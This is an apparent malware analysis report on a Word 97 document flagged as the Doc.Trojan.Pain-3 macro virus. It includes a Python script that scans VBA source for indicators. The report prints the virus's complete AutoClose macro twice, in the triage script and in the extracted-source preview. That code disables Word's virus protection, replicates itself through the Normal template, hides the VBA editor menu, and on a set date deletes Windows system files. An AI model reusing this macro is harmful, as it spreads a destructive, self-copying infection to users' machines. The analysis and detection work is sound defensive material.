Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 47c545a2d1c62659…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 27.0 KB
Created: 2001-08-07 14:10:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 6df3b44686ec8508988d61b5cfeb2b61
SHA-1: 39125633759904e12c190d12d65cc1cd491421fc
SHA-256: 47c545a2d1c62659e96138d4245b7943b964f255837dba44a33cf79be47e2864
Risk score: 140

Malware Insights

MITRE ATT&CK
  T1059.005 Command and Scripting Interpreter: Visual Basic
  T1566.001 Phishing: Spearphishing Attachment

The file carries a VBA AutoClose macro in the ThisDocument module, so it runs without user interaction whenever the infected document is closed. The 'OLE_LEGACY_WORDBASIC_AUTOEXEC' heuristic fired on the auto-execution name marker, but the recovered code drives the VBA extensibility object model (VBProject.VBComponents.CodeModule), so this is Word 97 VBA rather than WordBasic; the 'OLE_VBA_AUTOCLOSE' heuristic is the accurate one. On every run the macro sets On Error Resume Next, disables the Ctrl+Break cancel key (EnableCancelKey = Not -1, i.e. 0), and zeroes Options.VirusProtection (Word's macro warning prompt), ConfirmConversions and SaveNormalPrompt so that the modified Normal template is saved silently. It then copies its own source into the first module of NormalTemplate.VBProject (persistence: every later document inherits the macro) and back into the active document (replication), deletes the submenu of the sixth Menu Bar menu (Tools, in the default Word 97 layout) whose items include one whose caption ends in "Basic", which removes the user's path to the Visual Basic Editor, stamps the document's Keywords property with 'Word97-2k.Macro.PAIN' as a family marker, and saves the document while restoring the original Saved flag. The destructive payload, Kill on C:\Windows\System\*.* and C:\Windows\*.*, is gated on Left(Date, 5) = "30.12"; that compares the first five characters of the locale-formatted date, so it fires on 30 December only on systems using a dd.mm.yyyy short-date format and never on, for example, a US-formatted system. The ClamAV detection 'Doc.Trojan.Pain-3' corroborates the classification.
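The behaviours above can be triaged mechanically from the decoded VBA text that olevba produces. The following script is an added example for this report, not part of the analysis platform or of oletools: it embeds the sample's AutoClose body (copied from the Extracted artifacts section of this report) as a constructed input and scans it for the indicators the summary names. The indicator names, regular expressions and severity weights are this example's own choices, not the heuristics or scoring of the platform.

```python
"""Triage decoded Word VBA source for macro-virus indicators (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed input: the AutoClose body of the sample, copied from the report's
# extracted macros.bas (module Attribute lines omitted).
SAMPLE_VBA = r'''
Sub AutoClose()
On Error Resume Next
S = ActiveDocument.Saved
DisableAutoMacro = False
Text = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Countoflines)
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
If Left(Date, 5) = "30.12" Then Kill ("C:\Windows\System\*.*"): Kill ("C:\Windows\*.*")
Set Mac = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
If Mac.Lines(1, Mac.Countoflines) <> Text Then
Mac.DeleteLines 1, Mac.Countoflines: Mac.AddfromString Text
For Each Control In CommandBars("Menu Bar").Controls(6).Controls
If Control.Type = 10 Then
For I = 1 To Control.Controls.Count
If Right(Control.Controls(I).Caption, 5) = "Basic" Then Control.Delete
Next I
End If
Next Control
End If
Set Mac = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
If Mac.Lines(1, Mac.Countoflines) <> Text Then Mac.DeleteLines 1, Mac.Countoflines: Mac.AddfromString Text
With Dialogs(wdDialogFileSummaryInfo): .Keywords = "Word97-2k.Macro.PAIN": .Execute: End With
If ActiveDocument.Path <> "" Then ActiveDocument.Save
ActiveDocument.Saved = S
End Sub
'''


@dataclass(frozen=True)
class Indicator:
    name: str       # hypothetical indicator id chosen for this example
    severity: str
    pattern: re.Pattern
    why: str


INDICATORS = [
    Indicator("AUTO_EXEC_MACRO", "high",
              re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+"
                         r"(?:Auto(?:Open|Close|Exec|Exit|New)|Document_(?:Open|Close|New))\b",
                         re.I | re.M),
              "runs without user action when the document is opened or closed"),
    Indicator("VIRUS_PROTECTION_DISABLED", "high",
              re.compile(r"\.VirusProtection\s*=\s*(?:0|False)\b", re.I),
              "switches off the Word 97/2000 macro warning prompt"),
    Indicator("CANCEL_KEY_DISABLED", "medium",
              re.compile(r"EnableCancelKey\s*=\s*(?:Not\s+-1|0|wdCancelDisabled)\b", re.I),
              "Ctrl+Break cannot interrupt the macro"),
    Indicator("NORMAL_TEMPLATE_CODE_WRITE", "high",
              re.compile(r"NormalTemplate\.VBProject", re.I),
              "touches the Normal template's VBA project (persistence)"),
    Indicator("VBPROJECT_SELF_COPY", "high",
              re.compile(r"\.(?:AddFromString|InsertLines)\b", re.I),
              "injects source into another module (replication)"),
    Indicator("DESTRUCTIVE_KILL", "critical",
              re.compile(r'\bKill\s*\(?\s*"[^"]*\\\*\.\*"', re.I),
              "wildcard file deletion"),
    Indicator("DATE_LOGIC_BOMB", "medium",
              re.compile(r'Left\(\s*Date\s*,\s*\d+\s*\)\s*=\s*"[^"]+"', re.I),
              "payload gated on a calendar date"),
    Indicator("MENU_TAMPER", "medium",
              re.compile(r"CommandBars\([^)]*\)[\s\S]*?\.Delete\b", re.I),
              "removes menu entries (hides the VBA editor from the user)"),
    Indicator("INFECTION_MARKER", "low",
              re.compile(r'\.Keywords\s*=\s*"[^"]+"', re.I),
              "stamps document properties with a family tag"),
]

# Hypothetical weights for this example only; not the platform's risk model.
SEVERITY_WEIGHT = {"low": 5, "medium": 15, "high": 30, "critical": 50}


def triage(vba_source: str) -> list[Indicator]:
    """Return every indicator whose pattern occurs in the decoded VBA text."""
    return [ind for ind in INDICATORS if ind.pattern.search(vba_source)]


def kill_targets(vba_source: str) -> list[str]:
    """Paths passed to Kill, in source order."""
    return re.findall(r'\bKill\s*\(?\s*"([^"]+)"', vba_source, re.I)


def date_trigger(vba_source: str) -> tuple[int, str] | None:
    """(prefix length, literal) of a Left(Date, n) = "..." gate, or None.

    Left(Date, 5) = "30.12" compares the locale-formatted date, so it only
    fires on 30 December under a dd.mm.yyyy short-date format.
    """
    m = re.search(r'Left\(\s*Date\s*,\s*(\d+)\s*\)\s*=\s*"([^"]+)"', vba_source, re.I)
    return (int(m.group(1)), m.group(2)) if m else None


def infection_marker(vba_source: str) -> str | None:
    """Value written into the Keywords summary property, if any."""
    m = re.search(r'\.Keywords\s*=\s*"([^"]+)"', vba_source, re.I)
    return m.group(1) if m else None


def risk_score(findings: list[Indicator]) -> int:
    return sum(SEVERITY_WEIGHT[f.severity] for f in findings)


if __name__ == "__main__":
    found = triage(SAMPLE_VBA)
    for f in found:
        print(f"[{f.severity:8}] {f.name}: {f.why}")
    print("Kill targets:", kill_targets(SAMPLE_VBA))
    print("Date trigger:", date_trigger(SAMPLE_VBA))
    print("Marker:", infection_marker(SAMPLE_VBA))
    print("Score:", risk_score(found))
```

To run it against a real sample, replace SAMPLE_VBA with the output of olevba's decoded source (the file listed under Extracted artifacts) and treat the result as analyst-facing evidence: the regexes key on names and literals, so obfuscated or string-built calls will not match.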

Heuristics (4)

  • ClamAV: Doc.Trojan.Pain-3 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Pain-3
  • VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro [high] OLE_VBA_AUTOCLOSE
    An AutoClose auto-execution macro runs when the document is closed, without user interaction.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this generic rule text does not match this sample in full: a VBA project was recovered (see Extracted artifacts), so the marker here is the AutoClose name rather than WordBasic code.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   5280 bytes
SHA-256: 153f82dead3ff3974520eee6db00e85f60c142b5f7fd835d967881a862c3c802

Preview: first 1,000 lines of the extracted script (decoded VBA source, followed by the p-code disassembly as comments)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub AutoClose()
On Error Resume Next
S = ActiveDocument.Saved
DisableAutoMacro = False
Text = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Countoflines)
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
If Left(Date, 5) = "30.12" Then Kill ("C:\Windows\System\*.*"): Kill ("C:\Windows\*.*")
Set Mac = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
If Mac.Lines(1, Mac.Countoflines) <> Text Then
Mac.DeleteLines 1, Mac.Countoflines: Mac.AddfromString Text
For Each Control In CommandBars("Menu Bar").Controls(6).Controls
If Control.Type = 10 Then
For I = 1 To Control.Controls.Count
If Right(Control.Controls(I).Caption, 5) = "Basic" Then Control.Delete
Next I
End If
Next Control
End If
Set Mac = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
If Mac.Lines(1, Mac.Countoflines) <> Text Then Mac.DeleteLines 1, Mac.Countoflines: Mac.AddfromString Text
With Dialogs(wdDialogFileSummaryInfo): .Keywords = "Word97-2k.Macro.PAIN": .Execute: End With
If ActiveDocument.Path <> "" Then ActiveDocument.Save
ActiveDocument.Saved = S
End Sub



' Processing file: /opt/analyzer/scan_staging/66f3077d62d548e1a1713ba85a75fa52.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 2828 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Sub AutoClose())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	Ld ActiveDocument 
' 	MemLd Saved 
' 	St S 
' Line #4:
' 	LitVarSpecial (False)
' 	St DisableAutoMacro 
' Line #5:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd Countoflines 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St Then 
' Line #6:
' 	LitDI2 0x0001 
' 	UMi 
' 	Not 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #7:
' 	StartWithExpr 
' 	Ld Options 
' 	With 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith ConfirmConversions 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith VirusProtection 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith SaveNormalPrompt 
' 	BoS 0x0000 
' 	EndWith 
' Line #8:
' 	Ld Date 
' 	LitDI2 0x0005 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0005 "30.12"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0015 "C:\Windows\System\*.*"
' 	Paren 
' 	ArgsCall Kill 0x0001 
' 	BoS 0x0000 
' 	LitStr 0x000E "C:\Windows\*.*"
' 	Paren 
' 	ArgsCall Kill 0x0001 
' 	EndIf 
' Line #9:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	Set Mac 
' Line #10:
' 	LitDI2 0x0001 
' 	Ld Mac 
' 	MemLd Countoflines 
' 	Ld Mac 
' 	ArgsMemLd Lines 0x0002 
' 	Ld Then 
' 	Ne 
' 	IfBlock 
' Line #11:
' 	LitDI2 0x0001 
' 	Ld Mac 
' 	MemLd Countoflines 
' 	Ld Mac 
' 	ArgsMemCall DeleteLines 0x0002 
' 	BoS 0x0000 
' 	Ld Then 
' 	Ld Mac 
' 	ArgsMemCall AddfromString 0x0001 
' Line #12:
' 	StartForVariable 
' 	Ld Control 
' 	EndForVariable 
' 	LitDI2 0x0006 
' 	LitStr 0x0008 "Menu Bar"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemLd Controls 
' 	ForEach 
' Line #13:
' 	Ld Control 
' 	MemLd TypeOf 
' 	LitDI2 0x000A 
' 	Eq 
' 	IfBlock 
' Line #14:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Control 
' 	MemLd Controls 
' 	MemLd Count 
' 	For 
' Line #15:
' 	Ld I 
' 	Ld Control 
' 	ArgsMemLd Controls 0x0001 
' 	MemLd Caption 
' 	LitDI2 0x0005 
' 	ArgsLd Right 0x0002 
' 	LitStr 0x0005 "Basic"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld Control 
' 	ArgsMemCall Delete 0x0000 
' 	EndIf 
' Line #16:
' 	StartForVariable 
... (truncated)